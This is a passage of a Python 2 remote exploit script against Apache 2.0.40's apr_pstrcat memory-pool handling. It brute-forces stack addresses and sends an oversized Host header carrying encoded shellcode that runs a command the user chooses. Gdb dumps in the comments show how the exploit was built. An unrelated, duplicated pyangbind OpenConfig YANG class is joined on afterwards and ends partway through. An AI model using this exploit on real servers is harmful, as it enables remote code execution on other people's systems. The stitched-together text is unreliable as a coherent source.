# "apr_memnode_t *active" is at offset 0x28 from the start of the
# "apr_pool_t" structure, so to succeed, whack_pool_pointer needs to
# be 0x14 less than the frame pointer of apr_pstrcat(), so that
# whack_pool_pointer + 0x28 gets us our buffer's start address loaded
# as "pool->active"...8^)
# Stack frame at 0xbfffe288:
# eip = 0x402fa19c in apr_pstrcat; saved eip 0x8077ef7
# called by frame at 0xbfffe2f8, caller of frame at 0xbfffe228
# Arglist at 0xbfffe288, args:
# Locals at 0xbfffe288, Previous frame's sp in esp
# Saved registers:
# ebp at 0xbfffe288, edi at 0xbfffe284, eip at 0xbfffe28c
# (gdb) x/32xw 0xbfffe288
# 0xbfffe288: 0xbfffe2f8 0x08077ef7 0xbfffe274 0x08085dbb
# 0xbfffe298: 0x0808c9a0 ** 0x081f6038 ** 0x0808bf82 0xbfffe2c0
# 0xbfffe2a8: 0x0808bf72 0x00000000 0x081d1790 0x081f7e38
# 0xbfffe2b8: 0x00000000 0x48000010 0x00333434 0x081f7e38
# 0xbfffe2c8: 0xbfffe2f8 0x081e9e28 0x50415448 0x081f5da8
# 0xbfffe2d8: 0xbfffe2f8 0x402fc718 0x081f5da8 0x08161ae5
# 0xbfffe2e8: 0x0000002d 0x081e9e28 0x0000000c 0x081f5da8
# ...so, to hit on this target, for example...
# 0xbfffe298 --> contains desired load address for "pool->active"
# - 0x14
# ==========
# 0xbfffe288 --> stack frame for apr_pstrcat()
# - 0x14
# ==========
# 0xbfffe274 --> setting we'll need for whack_pool_pointer
# ============================================================================
end_address = long(sys.argv[5], 16)
address_increment = int(sys.argv[6], 16)
hex_pad_byte = int(sys.argv[7], 16)
plain_command_to_execute = sys.argv[8]
# ============================================================================
# ============= Shellcode prep/encode...
# ============================================================================
plain_cmdshellcode = \
plain_cmdshellcode_front + \
plain_command_to_execute + \
plain_cmdshellcode_back;
plain_cmdshellcode_length = len(plain_cmdshellcode);
# Yo!!! Encoder wench!!!
encoded_shellcode = encoder_wench(plain_cmdshellcode)
encoded_shellcode_length = len(encoded_shellcode);
# Final shellcode = the decoder wench + our encoded shellcode...
final_encoded_shellcode = decoder_wench
for i in range(0, encoded_shellcode_length):
final_encoded_shellcode += encoded_shellcode[i]
final_encoded_shellcode_length = len(final_encoded_shellcode);
# Time info
start_time = time.asctime(time.gmtime())
print "== %s ==============================================================" % (start_time)
print 'parameter server_address.....................: %s' % (server_address)
print 'parameter port...............................: 0x%x (%d)' % (port, port)
print 'parameter packet_size........................: 0x%x (%d)' % (packet_size, packet_size)
print 'parameter start_address......................: 0x%x' % (start_address)
print 'parameter end_address........................: 0x%x' % (end_address)
print 'parameter address_increment..................: 0x%x (%d)' % (address_increment, address_increment)
print 'parameter hex_pad_byte.......................:',
if (hex_pad_byte == 0x0):
# Randomize...
print 'Somewhat RANDOM Bytes'
else:
print '0x%x' % (hex_pad_byte)
print 'parameter plain_command_to_execute...........: <%s>' % (plain_command_to_execute)
# Now...we want to point "pool->active->first_avail" at the start of the
# stack pointer for memcpy(), so that we can whack memcpy()'s return
# address directly...if we don't, we'll crash in a bit in either
# memcpy() or strlen(), since apr_pstrcat() cruises through its
# variable argument list a second time, and we can't get a NULL word
# into the overwritten buffer, due to filtration...8^(
#
# We find the stack at the point of memcpy() (who is, apparently, frameless,
# and uses %esp for return purposes, not %ebp) to look like...
# Dump of assembler code for function memcpy:
# 0x4207bfd0 <memcpy+0>: mov 0xc(%esp,1),%ecx
# 0x4207bfd4 <memcpy+4>: mov %edi,%eax
# 0x4207bfd6 <memcpy+6>: mov 0x4(%esp,1),%edi
# 0x4207bfda <memcpy+10>: mov %esi,%edx
# 0x4207bfdc <memcpy+12>: mov 0x8(%esp,1),%esi
# 0x4207bfe0 <memcpy+16>: cld
# 0x4207bfe1 <memcpy+17>: shr %ecx
# 0x4207bfe3 <memcpy+19>: jae 0x4207bfe6 <memcpy+22>
# 0x4207bfe5 <memcpy+21>: movsb %ds:(%esi),%es:(%edi)
# 0x4207bfe6 <memcpy+22>: shr %ecx
# 0x4207bfe8 <memcpy+24>: jae 0x4207bfec <memcpy+28>
# 0x4207bfea <memcpy+26>: movsw %ds:(%esi),%es:(%edi)
# 0x4207bfec <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
# 0x4207bfee <memcpy+30>: mov %eax,%edi
# 0x4207bff0 <memcpy+32>: mov %edx,%esi
# 0x4207bff2 <memcpy+34>: mov 0x4(%esp,1),%eax
# 0x4207bff6 <memcpy+38>: ret
# End of assembler dump.
# 0 0x4207bfea in memcpy () at memcpy:-1
# 1 0x402fa1e6 in apr_pstrcat () from /usr/lib/libapr.so.0
# 0xbfffe22c: *** 0x402fa1e6 *** 0xbffff625 0xbfffffff 0x0000000b
# 0xbfffe23c: 0x00001390 0xbfffe2ac 0x0000000b 0x00000006
# 0xbfffe24c: 0xbfffe273 0x00000000 0x00000021 0x00001388
# 0xbfffe25c: 0x00000006 0x00000003 0x0000000b 0xbfffe288
# 0xbfffe26c: 0x0806e3b5 0x3c1d1790 0x72646461 0x3e737365
# 0xbfffe27c: 0x63617041 0x322f6568 0x342e302e 0x65532030
whack_memcpy_return_address_frame_pointer_decrement = 0x5c
# Let's divide our packet_size by 2, and also decrement back that far, to...
# 1...hopefully avoid falling off the end of the stack (some frame pointers can
# be notably cheap/cheesy in their allocations, we've found...and
# 2...get our whack values and shellcode into the middle of the buffer...
whack_prevent_from_falling_off_stack_decrement = packet_size / 2
whack_prevent_from_falling_off_stack_decrement = packet_size - 0x100
# ... 0xbfffe288: 0x90909090...1st argument: apr_pool_t *a
# ... 0xbfffe288: 0x08085dbb...2nd argument: <_IO_stdin_used+2135>: ""
# ... 0xbfffe298: 0x0808c9a0...3rd argument: <ap_bucket_type_error+4256>: "<address>Apache/2.0.40 Server at "
# ... 0xbfffe298: 0x081f6038...4th argument: '\220' <repeats 200 times>...
# ... 0xbfffe298: 0x0808bf82...5th argument: <ap_bucket_type_error+1666>: " Port "
# ... 0xbfffe298: 0xbfffe2c0...6th argument: "443"
# ... 0xbfffe2a8: 0x0808bf72...7th argument; <ap_bucket_type_error+1650>: "</address>\n"
# ... 0xbfffe2a8: 0x00000000...NULL...end of variable argument list
whack_active_first_avail_decrement = \
len('<address>Apache/2.0.40 Server at ') + \
len(' Port ') + \
len('443') + \
len('</address>\n') + \
whack_prevent_from_falling_off_stack_decrement + \
0x10
# What the heck, we have the room...
whack_pool_pointer = long(whack_frame_pointer - 0x14)
whack_active_first_avail_pointer = whack_frame_pointer - whack_memcpy_return_address_frame_pointer_decrement
print "=========================================================================================="
print 'computed whack_pool_pointer.................: 0x%x' % (whack_pool_pointer)
print 'original whack_active_first_avail_pointer...: 0x%x' % (whack_active_first_avail_pointer)
whack_active_first_avail_pointer -= whack_active_first_avail_decrement
whack_active_endp_pointer = 0xbffffff0
# Program received signal SIGSEGV, Segmentation fault.
# 0xdeadbeef in ?? ()
# (gdb) ir
# eax:<0xb3b3b3b3> ecx:<0x00000000> edx:<0xbfffe208> ebx:<0x4030d508>
# esp:<0xbfffe230> ebp:<0xbfffe288> esi:<0xbfffe208> edi:<0x081f6038>
# eip:<0xdeadbeef> efl:<0x00010216> cs:<0x00000023> ss:<0x0000002b>
# ds:<0x0000002b> es:<0x0000002b> fs:<0x00000000> gs:<0x00000033>
# jump_vector_address = 0xdeadbeef
# Cool...8^)
#
# Hey...how about.....0x8051d9f <data.0+134552431>: call *%edi
# jump_vector_address -> 0x8051d9f...the original
jump_vector_address = '\x9f\x1d\x05\x08'
# Program received signal SIGSEGV, Segmentation fault.
# 0x081f6038 in ?? ()
# (gdb) x/128xw 0x081f6038
# 0x81f6038: 0xa2a2a2a2 0xa3a3a3a3 0xa4a4a4a4 0xa5a5a5a5
# 0x81f6048: 0xbffff5a7 0xbffffff0 0xa1a1a1a1 0xa1a1a1a1
# 0x81f6058: 0xb3b3b3b3 0x08051d9f 0xb3b3b3b3 0xb3b3b3b3
# 0x81f6068: 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4
# 0x81f6078: 0xb5b5b5b5 0xb5b5b5b5 0xb5b5b5b5 0xb5b5b5b5
# So...if we make that first word a jump $+0x30, for example, we win, starting at
# --> 0x81f6068: 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4
print 'computed whack_active_first_avail_pointer...: 0x%x' % (whack_active_first_avail_pointer)
print 'computed whack_active_endp_pointer..........: 0x%x' % (whack_active_endp_pointer)
print 'computed final_encoded_shellcode_length.....: 0x%x (%d)' % (final_encoded_shellcode_length, final_encoded_shellcode_length)
print "=========================================================================================="
we_still_think_target_is_vulnerable = 0
whack_count = whack_ungrokkable_count = keyboard_interrupt_count = probable_crash_count = total_bytes_thrown = total_bytes_received = long(0)
not_time_to_quit = 1
try:
while (not_time_to_quit and (whack_frame_pointer <= end_address)):
whack_time = time.asctime(time.gmtime())
print "0x%x == %s ============================================================" % (whack_frame_pointer,whack_time)
(bogus_ass_active_first_avail_byte_count, bogus_ass_active_first_avail_bytes) = bogus_ass_address_bytes(whack_active_first_avail_pointer)
# Now comes the hard part...we need to take our current parameters, and generate
# either 1 or 18 (yes, I said 18) iterations, depending on whether or not we
# can pass the computed whack_active_first_avail_pointer through unfiltered
# (the "quick" mode), or need to generate the other 18 potential addresses
# to try and whack 1 of the 18 copies of the "apr_pool_t *" pointer that can
# be found on the stack (the "thorough" mode)...
#
# Stack 'em up...
pool_pointer_address_stack = []
stack_offset_list = []
if (bogus_ass_active_first_avail_byte_count):
# Aw, poop...Can't do a single throw...need the "thorough" mode...
print '0x%x ---> THOROUGH attack due to %d ungrokkable whack_active_first_avail_pointer address (0x%x) byte(s):' % (whack_frame_pointer, bogus_ass_active_first_avail_byte_count, whack_active_first_avail_pointer), bogus_ass_active_first_avail_bytes
stack_offset_list = thorough_stack_offset_list
else:
stack_offset_list = quick_stack_offset_list
for stack_offset in stack_offset_list:
# Sorry...offsets mistakenly computed based on the pool->active pointer...I know, I know,
# I should have done it from the computed pool pointer in each case, but you know,
# you only have so much time to use a graphical calculator in life, and if you
# want to rebalance each offset by the additional 0x28, and then use the
# whack_pool_pointer, please feel free...but adding in the 0x28 here gets
# us the correct value, go figure...
try_pool_pointer = whack_pool_pointer + long(stack_offset)
if (attempted_whack_pool_pointers.has_key(try_pool_pointer)):
# Yep...tried this one already...skip around, but keep a count...
attempted_whack_pool_pointers[try_pool_pointer] += 1
else:
# Nope...haven't seen this one yet...
attempted_whack_pool_pointers[try_pool_pointer] = 1
pool_pointer_address_stack.append(try_pool_pointer)
# Before we start popping 'em off...reverse 'em, since we went least to greatest
# while adding...that way, we'll also be least to greatest while popping off...8^)
pool_pointer_address_stack.reverse()
pool_pointer_count = len(pool_pointer_address_stack)
while (not_time_to_quit and len(pool_pointer_address_stack)):
# Pop 'em off...one at a time...
whack_pool_pointer = pool_pointer_address_stack.pop()
print "0x%x (%02d of %02d) =============================================================================" % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
(bogus_ass_pool_byte_count, bogus_ass_pool_bytes) = bogus_ass_address_bytes(whack_pool_pointer)
if (bogus_ass_pool_byte_count):
# Aw, poop...Bump the whack ungrokkable count...
print '0x%x (%02d of %02d) ---> SKIPPING due to %d ungrokkable whack_pool_pointer address (0x%x) byte(s):' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, bogus_ass_pool_byte_count, whack_pool_pointer), bogus_ass_pool_bytes
whack_ungrokkable_count += 1
else:
# FIRE IN THE HOLE!!!
print '0x%x (%02d of %02d) ---> Throwing whack_pool_pointer: 0x%x' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, whack_pool_pointer)
# TCP socket, please...
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Remote side tuple...
target_address = (server_address, port)
print '0x%x (%02d of %02d) ---> Connecting to %s via TCP port %d...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, server_address, port)
s.connect(target_address)
if (port == 80):
# sb whack...
msg = 'GET /manual HTTP/1.1'
elif (port == 443):
msg = 'GET /index.html HTTP/1.0'
else:
msg = 'GET /index.html HTTP/1.0'
print "0x%x (%02d of %02d) ---> Sending: <%s>" % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, msg)
msg += '\n'
s.send(msg)
total_bytes_thrown += len(msg)
host_field = 'Host: '
for i in range(0, packet_size):
if ((i >= 0x0) and (i <= 0x3)):
# Okay...first 0x30 bytes of our buffer are the
# bogus "apr_pool_t" structure, which we hop to
# via stack...
# 0x10...first_avail
# 0x14...endp
#
# We need to jump ahead just a bit, to jump over our critical values
# used at offsets 0x10, 0x14 and 0x24, to shellcode, which we're
# gonna place at offset 0x30...
host_field += jump_me_baby[i]
elif ((i >= 0x4) and (i <= 0x7)):
# Less of a jump, by 4 bytes...
#
# We need to jump ahead just a bit, to jump over our critical values
# used at offsets 0x10, 0x14 and 0x24, to shellcode, which we're
# gonna place at offset 0x30...
host_field += jump_me_baby[i - 0x4]
elif (((i >= 0x10) and (i <= 0x13)) or ((i >= 0x610) and (i <= 0x613))):
# char *pool->active->first_avail
if (i % 4 == 0):
host_field += chr(whack_active_first_avail_pointer & 0xff)
elif (i % 4 == 1):
host_field += chr((whack_active_first_avail_pointer >> 8) & 0xff)
elif (i % 4 == 2):
host_field += chr((whack_active_first_avail_pointer >> 16) & 0xff)
else:
host_field += chr((whack_active_first_avail_pointer >> 24) & 0xff)
elif (((i >= 0x14) and (i <= 0x17)) or ((i >= 0x614) and (i <= 0x617))):
# char *pool->active->endp
if (i % 4 == 0):
host_field += chr(whack_active_endp_pointer & 0xff)
elif (i % 4 == 1):
host_field += chr((whack_active_endp_pointer >> 8) & 0xff)
elif (i % 4 == 2):
host_field += chr((whack_active_endp_pointer >> 16) & 0xff)
else:
host_field += chr((whack_active_endp_pointer >> 24) & 0xff)
elif ((i >= 0x30) and (i < (0x30 + final_encoded_shellcode_length))):
# We want shellcode hereabouts...8^)
# Mom...we're home!!!
host_field += final_encoded_shellcode[i - 0x30]
elif (((i >= 0x600) and (i <= 0x603)) or ((i >= 0x620) and (i <= 0x623))):
# The target offset...otherwise known as our bogus pool pointer...8^)
if (i % 4 == 0):
host_field += chr(whack_pool_pointer & 0xff)
elif (i % 4 == 1):
host_field += chr((whack_pool_pointer >> 8) & 0xff)
elif (i % 4 == 2):
host_field += chr((whack_pool_pointer >> 16) & 0xff)
else:
host_field += chr((whack_pool_pointer >> 24) & 0xff)
# elif ((i >= 0x7d0) and (i <= 0x1387)):
# elif ((i >= 0x1200) and (i <= 0x1300)):
# elif ((i >= 0x1000) and (i <= packet_size)):
elif ((i >= 0x604) and (i <= packet_size)):
# Ass end of the packet...non-scientifically adding 0x100/4 of 'em...
#
# Load a bunch of copies of our jump vector, in case we get any
# address byte translation...We can get more precise with additional
# testing at some later point...8^)
if (i % 4 == 0):
host_field += jump_vector_address[0]
elif (i % 4 == 1):
host_field += jump_vector_address[1]
elif (i % 4 == 2):
host_field += jump_vector_address[2]
else:
host_field += jump_vector_address[3]
else:
if (hex_pad_byte == 0x0):
# Randomizing...
random_pad_byte = chr(random.randint(0x1, 0xff) & 0xff)
while (bad_data_byte(random_pad_byte)):
random_pad_byte = chr(random.randint(0x1, 0xff) & 0xff)
host_field += random_pad_byte
else:
host_field += chr(hex_pad_byte)
host_field += '\n'
print '0x%x (%02d of %02d) ---> Sending: <Host> field...%d bytes' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, len(host_field))
s.send(host_field)
total_bytes_thrown += len(host_field)
if (port == 80):
# sb whack...2 of 3...
print '0x%x (%02d of %02d) ---> Sending: <Host> field...%d bytes' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, len(host_field))
s.send(host_field)
total_bytes_thrown += len(host_field)
# sb whack...3 of 3...don't forget the bogus port number!!!
bogus_port = '64432'
last_host_field = host_field[:len(host_field)]
last_host_field += ':'
last_host_field += bogus_port
last_host_field += '\n'
host_field = last_host_field
print '0x%x (%02d of %02d) ---> Sending: <Host> field...%d bytes' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, len(host_field))
s.send(host_field)
total_bytes_thrown += len(host_field)
double_newline = '\n\n'
print '0x%x (%02d of %02d) ---> Sending: <double newline>' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
s.send(double_newline)
total_bytes_thrown += len(double_newline)
try:
target_response = s.recv(8192)
if (len(target_response) == 0):
# Cool...looks like we whacked him, methinks...
print '0x%x (%02d of %02d) <--- Received: EOF on connection...no response came back!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
if (we_still_think_target_is_vulnerable == 0):
# Guess again, grasshopper...
we_still_think_target_is_vulnerable = 1
probable_crash_count += 1
else:
total_bytes_received += len(target_response)
print '0x%x <--- Received: %d bytes of response\n%s' % (whack_frame_pointer, len(target_response), target_response)
if (we_still_think_target_is_vulnerable == 0):
# Otay...vulnerability assessment, please...
#
# "I agree...Preparation H DOES feel good...on the whole..."
found_all_error_strings = {}
for key in not_vulnerable_strings.keys():
found_all_error_strings[key] = 1
for next_string in not_vulnerable_strings[key]:
if (target_response.find(next_string) == -1):
# Not found...okay, he COULD still be vulnerable...
found_all_error_strings[key] = 0
if (found_all_error_strings[key]):
# Uh-oh...he may NOT be vulnerable, 'cause he's matched
# one of our little detector string sets...
print '0x%x (%02d of %02d) **** Target appears NON-VULNERABLE!!!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
print '0x%x (%02d of %02d) **** Target may have --> %s <-- directive set...which would suck!!!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, key)
print '0x%x (%02d of %02d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count),
response = string.lower(raw_input())
if (response == ''):
response = 'y'
while ((response != 'y') and (response != 'n')):
print '\n0x%x (%02d of %02d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count),
if (response == ''):
response = 'y'
response = string.lower(raw_input())
if (response == 'n'):
# Your wish is my command...
#
# Bail...Premature Exit, Y'all!!!
print '\n0x%x (%02d of %02d) **** Bailing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
not_time_to_quit = 0
# raise WhackLoopException
else:
# Keep on cruising, and don't come in here again, since
# we've already been there, done that, got the $&@*#$&! T-shirt...
print '\n0x%x (%02d of %02d) Continuing, as requested...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
we_still_think_target_is_vulnerable = 1
# Done with this one...
del(found_all_error_strings[key])
# except KeyboardInterrupt, (errno, err_string):
# print '0x%x (%02d of %02d) <--- Received: ERROR occurred (%d): %s' % (whack_frame_pointer. pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, errno, err_string)
except KeyboardInterrupt:
keyboard_interrupt_count += 1
print '0x%x (%02d of %02d) (Hang: %d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, keyboard_interrupt_count),
response = string.lower(raw_input())
if (response == ''):
response = 'y'
while ((response != 'y') and (response != 'n')):
print '\n0x%x (%02d of %02d) (Hang: %d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, keyboard_interrupt_count),
response = string.lower(raw_input())
if (response == ''):
response = 'y'
if (response == 'n'):
# Your wish is my command...Close this connection...
print '\n0x%x (%02d of %02d) ---> Closing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
s.close()
# Bail...Premature Exit, Y'all!!!
print '0x%x (%02d of %02d) **** Bailing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
raise WhackLoopException
print '\n0x%x (%02d of %02d) Continuing, as requested...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
except:
print '0x%x (%02d of %02d) **** ERROR situation occurred!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
# Close this connection...
print '0x%x (%02d of %02d) ---> Closing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
s.close()
# Bump the whack count...
whack_count += 1
print "0x%x (%02d of %02d) =============================================================================" % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
# Bump our target address(es)...
print "0x%x == %s ============================================================" % (whack_frame_pointer,whack_time)
whack_frame_pointer += address_increment
whack_pool_pointer = whack_frame_pointer - 0x14
whack_active_first_avail_pointer = whack_frame_pointer - whack_memcpy_return_address_frame_pointer_decrement
whack_active_first_avail_pointer -= whack_active_first_avail_decrement
except WhackLoopException:
# Bailing...
print "=========================================================================================="
print 'Bailing as requested by user...'
# Pass 1...count the total number of different pool pointer values thrown...
multiple_whack_pool_pointers_computed = 0
total_whack_pool_pointers_computed = 0
for whacked_pool_pointer in attempted_whack_pool_pointers.keys():
total_whack_pool_pointers_computed += attempted_whack_pool_pointers[whacked_pool_pointer]
multiple_whack_pool_pointers_computed += (attempted_whack_pool_pointers[whacked_pool_pointer] - 1)
stop_time = time.asctime(time.gmtime())
print "=========================================================================================="
print 'completed address range 0x%x-0x%x by 0x%x completed' % (start_address, end_address, address_increment)
print 'completed whack(s) thrown....................: %d' % (whack_count)
print 'completed whack(s) ungrokkable (filtered)....: %d' % (whack_ungrokkable_count)
print 'completed keyboard interrupts (hung whacks?).: %d' % (keyboard_interrupt_count)
print 'completed whack_pool_pointer values computed.: %d' % (total_whack_pool_pointers_computed)
print 'multiply computed whack_pool_pointer values...: %d' % (multiple_whack_pool_pointers_computed)
print 'completed total whack attempts...............: %d' % (whack_count + whack_ungrokkable_count)
print 'completed total bytes thrown.................: %d' % (total_bytes_thrown)
print 'completed total bytes received...............: %d' % (total_bytes_received)
print 'completed probable httpd crash count.........: %d' % (probable_crash_count)
print 'completed start time.........................: %s' % (start_time)
print 'completed stop time..........................: %s' % (stop_time)
print "=========================================================================================="
# Pass 2...list the multiples...
# Pass 2...list the multiples...print 'the dupe whack_pool_pointer values............'
# Pass 2...list the multiples...sorted_by_key = attempted_whack_pool_pointers.keys()
# Pass 2...list the multiples...sorted_by_key.sort()
# Pass 2...list the multiples...for whacked_pool_pointer in sorted_by_key:
# Pass 2...list the multiples... if (attempted_whack_pool_pointers[whacked_pool_pointer] > 1):
# Pass 2...list the multiples... print "0x%8x --> %d" % (whacked_pool_pointer, attempted_whack_pool_pointers[whacked_pool_pointer])
# Pass 2...list the multiples...print "==================================================================================================================="
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
class max_reservable_link_bandwidth(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/max-reservable-link-bandwidth. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: This container defines sub-TLV 10.
    """

    # NOTE(review): generated code — limit hand edits to comments so the file
    # stays diffable against regenerated pyangbind output.
    # "__state" in __slots__ is name-mangled to
    # _max_reservable_link_bandwidth__state, matching self.__state below.
    __slots__ = ("_path_helper", "_extmethods", "__state")

    _yang_name = "max-reservable-link-bandwidth"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        self._path_helper = False
        self._extmethods = False
        # Read-only (config: false) child container holding the state leaves.
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )

        load = kwargs.pop("load", None)
        if args:
            # Copy-constructor path: accept one object exposing the same
            # element attributes and copy over every element that was set.
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                # Skip elements the source object never changed from default.
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Delegate upwards when attached to a parent container; otherwise
        # return this container's absolute YANG path.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "protocols",
                "protocol",
                "isis",
                "levels",
                "level",
                "link-state-database",
                "lsp",
                "tlvs",
                "tlv",
                "mt-isn",
                "neighbors",
                "neighbor",
                "subTLVs",
                "subTLVs",
                "max-reservable-link-bandwidth",
            ]

    def _get_state(self):
        """
        Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)

        YANG Description: State parameters of sub-TLV 10.
        """
        return self.__state

    def _set_state(self, v, load=False):
        """
        Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_state is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_state() directly.

        YANG Description: State parameters of sub-TLV 10.
        """
        # Unwrap a previously-wrapped value back to its underlying type
        # before re-wrapping it with this container's metadata.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=state.state,
                is_container="container",
                yang_name="state",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """state must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
                }
            )

        self.__state = t
        # Notify the parent wrapper (if any) that this container changed.
        if hasattr(self, "_set"):
            self._set()

    def _unset_state(self):
        # Restore the element to a fresh, unset default container.
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )

    # Read-only property (config false in YANG) — no setter is exposed.
    state = __builtin__.property(_get_state)

    _pyangbind_elements = OrderedDict([("state", state)])
from . import state
class max_reservable_link_bandwidth(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/max-reservable-link-bandwidth. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: This container defines sub-TLV 10.
    """

    # NOTE(review): near-duplicate of the class above, regenerated for the
    # openconfig-network-instance-l2 module; keep hand edits to comments.
    # "__state" in __slots__ is name-mangled to match self.__state below.
    __slots__ = ("_path_helper", "_extmethods", "__state")

    _yang_name = "max-reservable-link-bandwidth"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        self._path_helper = False
        self._extmethods = False
        # Read-only (config: false) child container holding the state leaves.
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )

        load = kwargs.pop("load", None)
        if args:
            # Copy-constructor path: accept one object exposing the same
            # element attributes and copy over every element that was set.
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                # Skip elements the source object never changed from default.
                if nobj._changed() is False:
                    continue
